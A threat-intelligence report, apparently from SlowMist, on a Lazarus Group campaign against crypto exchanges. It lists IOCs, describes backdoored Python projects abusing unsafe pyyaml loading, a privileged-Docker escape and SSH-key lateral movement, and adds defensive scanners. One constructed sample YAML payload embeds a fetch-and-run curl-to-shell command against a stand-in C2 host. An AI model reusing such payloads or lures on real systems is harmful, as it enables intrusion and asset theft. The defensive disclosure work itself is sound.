Author: 23pds & Thinking; Source: SlowMist Technology
Background
Since June 2024, the SlowMist security team has been invited by multiple teams to conduct forensic investigations into a series of hacker attacks. Building on earlier findings and on 30 days of in-depth analysis and investigation, we have completed our review of the attackers' methods and intrusion paths. The results show that this was a state-sponsored APT campaign against cryptocurrency exchanges. Through forensic analysis and correlation tracking, we attribute the attacks to the Lazarus Group.
After obtaining the relevant IOCs (indicators of compromise) and TTPs (tactics, techniques and procedures), we shared the intelligence with our partners as soon as possible. We also found that other partners had encountered the same attack methods and intrusion techniques. They were relatively lucky: the hackers triggered security alerts during the intrusion, and with a timely response from the security team the attack was blocked.
Because APT attacks on cryptocurrency exchanges have become increasingly serious, and after communicating with the parties involved, we decided to sanitize the IOCs and TTPs of this attack and publish them so that community partners can check their own environments and defend themselves in time. Due to confidentiality agreements, we cannot disclose much specific information about our partners. The rest of this article therefore focuses on the IOCs and TTPs.
Attacker Information
Attacker Domains:
gossipsnare[.]com, 51.38.145.49:443
showmanroast[.]com, 213.252.232.171:443
getstockprice[.]info, 131.226.2.120:443
eclairdomain[.]com, 37.120.247.180:443
replaydreary[.]com, 88.119.175.208:443
coreladao[.]com
cdn.clubinfo[.]io
Attacker IP:
193.233.171[.]58
193.233.85[.]234
208.95.112[.]1
204.79.197[.]203
23.195.153[.]175
Attacker's GitHub accounts:
https://github.com/mariaauijj
https://github.com/patriciauiokv
https://github.com/lauraengmp
Telegram: @tanzimahmed88
Backdoor package names:
StockInvestSimulator-main.zip
MonteCarloStockInvestSimulator-main.zip
Similar to …StockInvestSimulator-main.zip, etc.
Original (legitimate) project code:

(https://github.com/cristianleoo/montecarlo-portfolio-management)
The attacker's modified copy of the project:

Comparing the two shows that the attacker's copy adds a data_fetcher.py file in the data directory, which contains a suspicious Loader:

Backdoor technology used by attackers
The attackers abused pyyaml's unsafe yaml.load deserialization to achieve RCE (remote code execution): the malicious code is delivered as a YAML document and executed when the backdoored project parses it, giving the attackers control of the target workstation or server. Because the payload arrives as data rather than as an executable, this method evades detection by most antivirus software. After sharing intelligence with partners, we obtained multiple similar malicious samples.


Key technical analysis reference: https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation#how-to-disable-the-warning

Through in-depth analysis of the samples, the SlowMist Security Team successfully reproduced the attacker's pyyaml-based RCE (remote code execution) technique.
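The following is an added example and not SlowMist's code or the attacker's sample. It shows, without executing anything, the two halves of the pyyaml RCE chain described above: a Python file that feeds fetched text to yaml.load with an unsafe Loader, and a YAML document carrying a python-specific tag that such a Loader would turn into a call. The file names, the sample loader and the sample payload are all constructed for the example; the detection uses only the standard library so it can be run on a received project before anything in it is executed.

```python
"""Added example, not SlowMist's code or the attacker's sample: a static
triage pass over a project received from a stranger, covering both halves
of a PyYAML-based RCE chain without executing anything.

Mechanism (documented by PyYAML itself): yaml.load() with yaml.Loader,
yaml.UnsafeLoader, or the pre-5.1 default honours python-specific tags such
as !!python/object/apply:, which call arbitrary callables during parsing.
A dropped-in "loader" only needs yaml.load(text_from_c2, Loader=yaml.Loader)
to turn fetched data into code execution.  yaml.safe_load() has no such
constructors and is the fix.
"""
import ast
import re

# Loader classes that construct arbitrary Python objects.  FullLoader is
# included because releases before 5.4 still honoured python/object/apply.
UNSAFE_LOADERS = {"Loader", "UnsafeLoader", "FullLoader"}

# Any python-specific tag has no business in data that came off the network.
PYTHON_TAG = re.compile(r"!!python/[\w/]+:?")


def find_unsafe_yaml_loads(source: str):
    """Return [(lineno, reason)] for each yaml.load()/load_all() call in the
    given Python source that is not pinned to SafeLoader."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if not (isinstance(func, ast.Attribute)
                and isinstance(func.value, ast.Name)
                and func.value.id == "yaml"
                and func.attr in {"load", "load_all"}):
            continue  # only the yaml.<name>(...) spelling is handled here
        loader = next((kw.value for kw in node.keywords if kw.arg == "Loader"), None)
        if loader is None and len(node.args) >= 2:
            loader = node.args[1]  # positional Loader
        if loader is None:
            findings.append((node.lineno, f"yaml.{func.attr} without an explicit Loader"))
            continue
        name = loader.attr if isinstance(loader, ast.Attribute) else getattr(loader, "id", "?")
        if name in UNSAFE_LOADERS:
            findings.append((node.lineno, f"yaml.{func.attr} with {name}"))
    return sorted(findings)


def find_python_tags(yaml_text: str):
    """Return [(lineno, tag)] for every python-specific tag in a YAML document."""
    return [(n, m.group(0))
            for n, line in enumerate(yaml_text.splitlines(), 1)
            for m in PYTHON_TAG.finditer(line)]


def triage_project(files: dict):
    """files maps path -> content.  Route .py files to the AST check and
    YAML files to the tag check; return {path: findings} for hits only."""
    report = {}
    for path, content in files.items():
        if path.endswith(".py"):
            hits = find_unsafe_yaml_loads(content)
        elif path.endswith((".yml", ".yaml")):
            hits = find_python_tags(content)
        else:
            continue
        if hits:
            report[path] = hits
    return report


# Constructed stand-in for the backdoored data/data_fetcher.py (not the real sample).
SAMPLE_LOADER = '''
import yaml, requests

def load_config(url):
    text = requests.get(url).text
    return yaml.load(text, Loader=yaml.Loader)   # constructs arbitrary objects

def load_cached(path):
    return yaml.load(open(path))                # Loader omitted: version-dependent

def load_local(path):
    with open(path) as f:
        return yaml.safe_load(f)                 # the hardened form
'''

# Constructed payload of the shape an unsafe Loader would execute on parse.
SAMPLE_PAYLOAD = '''
prices: !!python/object/apply:subprocess.check_output
  - ["sh", "-c", "curl -s https://c2.example.invalid/stage2 | sh"]
'''

if __name__ == "__main__":
    print(triage_project({"data/data_fetcher.py": SAMPLE_LOADER,
                          "config.yaml": SAMPLE_PAYLOAD}))
```

The AST check deliberately treats a missing Loader as a finding rather than guessing the installed pyyaml version: before 5.1 the default was the unsafe Loader, 5.1 to 5.3 fell back to FullLoader (which still accepted python/object/apply), and 6.0 made the argument mandatory. The fix in every case is yaml.safe_load, and any !!python/ tag in data that crossed a network boundary is a payload, not a configuration.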

Key Analysis of the Attack
Goal and Motivation
Goal: The attacker's main goal is to gain control of the exchange's wallets by compromising its infrastructure, and then to transfer large amounts of crypto assets out of those wallets.
Motivation: Trying to steal high-value cryptocurrency assets.
Technical Means
1. Initial Intrusion
The attacker uses social engineering to trick employees into running seemingly legitimate code on their local devices or in Docker.
In this investigation, the malware used by the attackers included `StockInvestSimulator-main.zip` and `MonteCarloStockInvestSimulator-main.zip`. These files were disguised as legitimate Python projects but actually contained remote-access Trojans; the attackers used pyyaml-based RCE to deliver and execute malicious code, bypassing detection by most antivirus software.
2. Privilege escalation
Through the malware, the attacker obtained local control of the employee's device and tricked the employee into setting privileged to true in docker-compose.yaml.
With the container running as privileged, the attacker escalated from the container to the host and took full control of the target device.
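As an added example (not SlowMist's code), the check below audits a docker-compose file for the setting the employee was talked into, so that a project arriving with its own Compose stack can be screened before it is started. The weak and hardened Compose files are constructed for the example. The audit is deliberately line-based so that it never hands untrusted YAML to a parser itself; the pid: host and Docker-socket checks are an assumption that goes beyond the single setting the text names, since they are other well-known container-breakout preconditions the same pass should catch.

```python
"""Added example, not SlowMist's code: audit a docker-compose file for the
setting the employee was talked into (privileged: true) before running any
project that arrives with its own Compose stack.  Deliberately line-based,
so the check itself never hands untrusted YAML to a parser.  The pid: host
and docker.sock checks go beyond the single setting named in the text; they
are other breakout preconditions the same audit should catch (assumption).
"""
import re

# (pattern matched against one comment-stripped line, explanation)
RISKY_SETTINGS = [
    (re.compile(r"""^\s*privileged:\s*['"]?(true|yes)['"]?\s*$""", re.I),
     "privileged: true hands the container every capability and raw host "
     "devices; a foothold inside it is a foothold on the host"),
    (re.compile(r"^\s*pid:\s*host\s*$", re.I),
     "pid: host exposes every host process to the container"),
    (re.compile(r"""^\s*-\s*['"]?/var/run/docker\.sock[:\s'"]""", re.I),
     "Docker socket mounted: equivalent to root on the host"),
]


def audit_compose(text: str):
    """Return [(service, lineno, why)] for each risky setting under services:."""
    findings, service, in_services = [], None, False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].rstrip()     # drop trailing comments
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        if indent == 0:                           # top-level key
            in_services = line.strip() == "services:"
            service = None
            continue
        if in_services and indent == 2 and line.strip().endswith(":"):
            service = line.strip()[:-1]           # new service block
            continue
        if service is None:
            continue
        for pattern, why in RISKY_SETTINGS:
            if pattern.match(line):
                findings.append((service, lineno, why))
    return findings


# Constructed: the kind of file a "help me debug this" project ships with.
WEAK_COMPOSE = """\
services:
  simulator:
    build: .
    privileged: true          # "needed for the data feed", the victim is told
    volumes:
      - ./:/app
  helper:
    image: alpine
    pid: host
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
"""

# Constructed: the same service with the restrictions an untrusted project should get.
HARDENED_COMPOSE = """\
services:
  simulator:
    build: .
    user: "1000:1000"
    read_only: true
    cap_drop:
      - ALL
    security_opt:
      - no-new-privileges:true
    volumes:
      - ./data:/app/data:ro
"""

if __name__ == "__main__":
    for svc, n, why in audit_compose(WEAK_COMPOSE):
        print(f"line {n} [{svc}]: {why}")
    print("hardened:", audit_compose(HARDENED_COMPOSE))
```

The hardened file runs the same service as an unprivileged user with all capabilities dropped, a read-only root filesystem and only the data directory mounted; the request to flip privileged to true is itself the indicator, because no stock-simulation code needs raw access to the host.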
3. Internal reconnaissance and lateral movement
The attacker used the compromised employee computer to scan the intranet.
The attacker then exploited vulnerabilities in intranet services and applications to break into the company's internal servers.
The attacker stole the SSH keys of key servers and used the whitelist trust relationships between servers to move laterally to the wallet server.
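The lateral movement in step 3 rides on trust that the servers themselves grant: a stolen key is only as useful as what its authorized_keys entry permits. The following added example (not SlowMist's code) parses an authorized_keys file and reports entries that are not pinned to a source address with from= or confined with restrict/command=. The sample file, its host names and its key material are constructed placeholders.

```python
"""Added example, not SlowMist's code: audit an authorized_keys file for the
trust relationships the attacker rode from the application servers to the
wallet server.  A stolen key is only as dangerous as what its entry allows:
from= pins the source address, restrict/command= remove the shell and
forwarding.  Sample entries below are constructed; key material is a
placeholder, not a real key.
"""
import re

KEY_PREFIX = re.compile(r"^(ssh-|ecdsa-|sk-)")


def _split_options(line: str):
    """Split 'opts keytype data comment' at the first space outside quotes."""
    in_quote = False
    for i, ch in enumerate(line):
        if ch == '"' and (i == 0 or line[i - 1] != "\\"):
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            return line[:i], line[i + 1:].lstrip()
    return line, ""


def _parse_options(opts: str):
    """'from="a,b",restrict,command="x y"' -> {'from': 'a,b', 'restrict': '', ...}"""
    out, cur, in_quote = {}, "", False
    for ch in opts + ",":
        if ch == '"':
            in_quote = not in_quote
        if ch == "," and not in_quote:
            if cur:
                name, _, value = cur.partition("=")
                out[name] = value.strip('"')
            cur = ""
        else:
            cur += ch
    return out


def parse_authorized_keys(text: str):
    """Return one dict per key line: line, type, options, comment."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if KEY_PREFIX.match(line):
            opts, rest = {}, line                  # no options at all
        else:
            opt_text, rest = _split_options(line)
            opts = _parse_options(opt_text)
        parts = rest.split(None, 2)
        if len(parts) < 2:
            continue                               # not a key line
        entries.append({"line": lineno, "type": parts[0], "options": opts,
                        "comment": parts[2] if len(parts) == 3 else ""})
    return entries


def audit_authorized_keys(text: str):
    """Return [(line, comment, [issues])]; an empty issue list is a pinned key."""
    report = []
    for e in parse_authorized_keys(text):
        o, issues = e["options"], []
        if "from" not in o:
            issues.append("no from= restriction: a stolen copy works from any host")
        if "command" not in o and "restrict" not in o:
            issues.append("no command=/restrict: grants a full shell and forwarding")
        report.append((e["line"], e["comment"], issues))
    return report


# Constructed wallet-server authorized_keys; the base64 blobs are placeholders.
SAMPLE_AUTHORIZED_KEYS = """\
# unrestricted: a stolen copy of this key opens a shell from anywhere
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyMaterialA ops@app-01
# pinned to one peer and one command: trust the attacker cannot reuse elsewhere
from="10.20.0.11",restrict,command="/usr/bin/rrsync -ro /srv/wallet-backup" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyMaterialB backup@app-01
# pinned to a subnet but still a full shell
from="10.20.0.0/24" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQPlaceholderKeyMaterialC deploy@ci
"""

if __name__ == "__main__":
    for line, comment, issues in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS):
        print(f"line {line} ({comment}): {issues or 'OK'}")
```

Only the second entry survives the audit: a key copied off app-01 is useless from any other address, and even from app-01 it can run nothing but the backup sync. That is the shape a server-to-server trust relationship should have before a wallet host accepts it.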
4. Crypto asset transfer
5. Hiding traces
Attackers use legitimate enterprise tools, application services and infrastructure as a springboard to conceal the true source of their activity, and delete or destroy log data and malware samples.
Process
Attackers use social engineering to lure their targets. Common methods include:
1. Disguised as a project party, looking for key target developers, requesting help debugging the code, and expressing willingness to pay in advance to gain trust.

After tracking the related IP and UA (user-agent) information, we found that this payment was made through a third-party payment service and was of little investigative value.
2. Posing as an automated trader or investor, the attacker provides trading-analysis or quantitative-trading code and tricks the target into running the malicious program. Once it runs on the device, the program establishes a persistent backdoor and gives the attacker remote access.
The attacker uses the compromised device to scan the intranet, identify key servers, and exploit vulnerabilities in corporate applications to penetrate the network further. Because all of this traffic traverses the compromised device's VPN connection, it bypasses most security devices.
Once the attacker has obtained privileges on the relevant application servers, he steals the SSH keys of key servers, uses those servers' privileges to move laterally, and finally takes control of the wallet server and transfers the crypto assets to an external address. Throughout, the attacker deliberately uses the company's own internal tools and infrastructure, which makes the attack hard to detect quickly.
The attacker then tricks the employee into deleting the debugging programs and pays a "debugging reward", covering the traces of the attack.
In addition, some deceived employees, worried about being held accountable, delete the relevant information on their own initiative, so the incident is not reported promptly after the attack and investigation and evidence collection become more difficult.
Response Suggestions
APT (Advanced Persistent Threat) attacks are extremely difficult to defend against because of their stealth, clear targeting and long dwell times; traditional security measures often fail to detect their complex intrusion behaviour. It is therefore necessary to combine multi-layer security controls such as real-time monitoring, anomalous-traffic analysis, endpoint protection and centralized log management, so that the attacker's intrusion traces are detected as early as possible and the threat can be contained. The SlowMist Security Team proposes eight defensive directions and recommendations as a reference for community partners deploying their defenses:
1. Network Proxy Security Configuration
Goal: Configure security policies on network proxies so that access decisions and service management follow a zero-trust model.
Solutions: Fortinet (https://www.fortinet.com/), Akamai (https://www.akamai.com/glossary/where-to-start-with-zero-trust), Cloudflare (https://www.cloudflare.com/zero-trust/products/access/), etc.
2. DNS Traffic Security Protection
Objective: Implement security controls at the DNS layer to detect and block resolution of known malicious domains (including the IOCs listed above), and to prevent DNS spoofing and data exfiltration over DNS.
Solutions: Cisco Umbrella (https://umbrella.cisco.com/), etc.
3. Network traffic/host monitoring and threat detection
Objective: Analyze network request flows and monitor for abnormal behaviour in real time to identify potential attacks (IDS/IPS), and deploy HIDS on servers to catch exploitation attempts and other attacker activity as early as possible.
Solutions: SolarWinds Network Performance Monitor (https://www.solarwinds.com/), Palo Alto (https://www.paloaltonetworks.com/), Fortinet (https://www.fortinet.com/), Alibaba Cloud Security Center (https://www.alibabacloud.com/zh/product/security_center), GlassWire (https://www.glasswire.com/), etc.
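Whatever product is chosen, the intranet scan described in this incident has a simple signature: one VPN client touching many internal host:port pairs in a short window, often at a weekend or holiday hour. The following added example (not SlowMist's code) implements that detection over firewall-style flow records. The log format and every log line are constructed for the example, and the thresholds are assumptions to be tuned per environment.

```python
"""Added example, not SlowMist's code: a detection that would have fired on
the intranet sweep described above, where one compromised laptop scanned
internal hosts through its own VPN session.  Per-source fan-out (distinct
host:port pairs in a sliding window) is what a port sweep looks like in
firewall or VPN-concentrator logs whatever the source's reputation.  The
log format and all the lines are constructed for the example.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse_line(line: str):
    """'<ts> src=.. dst=.. dport=.. action=..' -> (ts, src, dst, dport)"""
    ts, *fields = line.split()
    f = dict(p.split("=", 1) for p in fields)
    return datetime.strptime(ts, FMT), f["src"], f["dst"], int(f["dport"])


def detect_sweeps(lines, window=timedelta(seconds=60), threshold=20):
    """Alert once per source that touches >= threshold distinct dst:port
    pairs inside `window`; also flag weekend / out-of-hours timing, which
    the article notes is when these intrusions tend to land."""
    events = sorted(parse_line(l) for l in lines if l.strip())
    recent = defaultdict(deque)   # src -> deque of (ts, (dst, dport))
    alerts, seen = [], set()
    for ts, src, dst, dport in events:
        q = recent[src]
        q.append((ts, (dst, dport)))
        while ts - q[0][0] > window:          # expire old entries
            q.popleft()
        targets = {t for _, t in q}
        if len(targets) >= threshold and src not in seen:
            seen.add(src)
            alerts.append({
                "src": src,
                "window_start": q[0][0],
                "targets": len(targets),
                "ports": sorted({p for _, p in targets}),
                "off_hours": ts.weekday() >= 5 or not 8 <= ts.hour < 20,
            })
    return alerts


def _constructed_logs():
    # Sunday 02:13 UTC: the weekend/holiday timing the investigators describe.
    base = datetime(2024, 6, 16, 2, 13, 0)
    lines = []
    # Benign VPN user: a few HTTPS connections to two internal hosts.
    for i, (dst, port) in enumerate([("10.20.0.5", 443), ("10.20.0.9", 443), ("10.20.0.5", 443)]):
        ts = base + timedelta(seconds=5 * i)
        lines.append(f"{ts.strftime(FMT)} src=10.8.0.41 dst={dst} dport={port} action=allow")
    # Compromised laptop: one probe per second across a /24, cycling ssh/http/https.
    for i in range(30):
        ts = base + timedelta(seconds=i)
        lines.append(f"{ts.strftime(FMT)} src=10.8.0.23 dst=10.20.0.{10 + i} "
                     f"dport={(22, 80, 443)[i % 3]} action=deny")
    return lines


SAMPLE_LOGS = _constructed_logs()

if __name__ == "__main__":
    for alert in detect_sweeps(SAMPLE_LOGS):
        print(alert)
```

The rule keys on fan-out rather than on denied connections alone, because the intranet services the attacker probed may well have answered. In practice it belongs in the centralized log platform of item 7 below, fed by VPN-concentrator and internal firewall logs, with the VPN address pool as the source range of interest.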
4. Network segmentation and isolation
Goal: Divide the network into smaller isolated zones to limit how far a compromise can spread and to strengthen access control; in this incident, segmentation between employee VPN clients, application servers and wallet servers would have constrained the lateral movement described above.
Solution: Cisco Identity Services Engine (https://www.cisco.com/site/us/en/products/security/identity-services-engine/index.html), cloud-platform security-group policies, etc.
5. System reinforcement measures
Goal: Apply hardening measures (configuration management, vulnerability scanning and patch updates) to reduce exploitable weaknesses and strengthen defenses.
Solutions: Tenable (https://www.tenable.com/), DISA STIGs at public.cyber.mil (https://public.cyber.mil), etc.
6. Endpoint Visibility and Threat Detection
Goal: Provide real-time monitoring of endpoint activity, identify potential threats and support rapid response (EDR); enforce an application allowlist so that abnormal programs are detected and alerted on promptly.
Solutions: CrowdStrike Falcon (https://www.crowdstrike.com/), Microsoft Defender for Endpoint (https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint), Jamf (https://www.jamf.com/) or WDAC (https://learn.microsoft.com/en-us/hololens/windows-defender-application-control-wdac), etc.
7. Centralized log management and analysis
Goal: Integrate log data from different systems into a unified platform to facilitate tracking, analysis and response to security incidents.
Solutions: Splunk Enterprise Security (https://www.splunk.com/), Graylog (https://graylog.org/), ELK (Elasticsearch, Logstash, Kibana), etc.
8. Cultivate team security awareness
Goal: Raise the security awareness of staff so that they can recognize most social-engineering attacks and report anomalies promptly after an incident, allowing faster investigation.
Solutions: Blockchain Dark Forest Self-help Manual (https://darkhandbook.io/), Web3 Phishing Technique Analysis (https://github.com/slowmist/Knowledge-Base/blob/master/security-research/Web3%20%E9%92%93%E9%B1%BC%E6%89%8B%E6%B3%95%E8%A7%A3%E6%9E%90.pdf), etc.
In addition, we recommend periodic red-blue confrontation drills to identify weaknesses in security process management and security defense deployment.
Written at the end
Attacks often occur on weekends and public holidays, which poses a considerable challenge to incident response and resource coordination. Throughout this process, 23pds (Shan Ge), Thinking, Reborn and other members of the SlowMist Security Team remained on call, taking turns to handle emergencies over the holidays and continuing to advance the investigation and analysis until the attacker's methods and intrusion paths had been fully reconstructed.
Looking back on this investigation, we not only revealed the Lazarus Group's attack methods but also analyzed its use of social engineering, vulnerability exploitation, privilege escalation, intranet penetration and fund transfer. We have also distilled defensive recommendations for APT attacks from real cases, hoping to provide a reference for the industry, help more institutions improve their security posture, and reduce the impact of potential threats. Cybersecurity is a protracted battle; we will continue to track similar attacks and help the community resist these threats together.